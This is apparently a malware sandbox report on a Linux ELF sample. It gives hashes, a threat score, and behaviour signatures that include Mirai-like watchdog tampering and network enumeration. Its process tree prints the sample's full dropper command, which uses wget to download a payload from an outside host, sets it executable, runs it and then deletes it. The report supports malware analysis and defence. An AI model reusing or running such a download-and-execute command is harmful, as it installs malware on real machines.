Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    142s
  • max time network
    143s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240221-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240221-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    22/02/2024, 21:46

General

  • Target

    ed53374c74224ead232e63bbe7fa7242.elf

  • Size

    114KB

  • MD5

    ed53374c74224ead232e63bbe7fa7242

  • SHA1

    e1ffd571459085cc2bd4c7ea2bc5916d408a9be3

  • SHA256

    918e9149b7bccfc9c8e9a22548e5953f249ac72bbf552af7774a41273a431d28

  • SHA512

    82d75789a09b5518ba22c8b79b9719c7933e6f1c6660259bbe4fb220af761e3f151f35148cfa25adf1f7b067c4e3f836cbfdb9ee69257b1c0d4e016f25f7f3a0

  • SSDEEP

    3072:uirMUYZMo/QJLRZDsqtxqLX5I/uJiouf2yd1m7FnVqfJXoebNb:SKo/O8qtUbKVbm7FnVqfJXoebNb

Score
7/10

Malware Config

Signatures

  • Changes its process name 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Reads system routing table 1 TTPs 1 IoCs

    Gets active network interfaces from /proc virtual filesystem.

  • Reads system network configuration 1 TTPs 1 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/ed53374c74224ead232e63bbe7fa7242.elf
    /tmp/ed53374c74224ead232e63bbe7fa7242.elf
    1⤵
    • Changes its process name
    • Reads system routing table
    • Reads system network configuration
    PID:1581
  • /bin/sh
    /bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."
    1⤵
      PID:1582
      • /usr/bin/wget
        wget -q http://gay.energy/.../vivid -O .....
        2⤵
        • Writes file to tmp directory
        PID:1586
      • /bin/chmod
        chmod 777 .....
        2⤵
          PID:1590
        • /tmp/.....
          ./.....
          2⤵
          • Executes dropped EXE
          PID:1591
        • /bin/sh
          /bin/sh ./.....
          2⤵
            PID:1591
          • /bin/rm
            rm -rf .....
            2⤵
              PID:1593

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads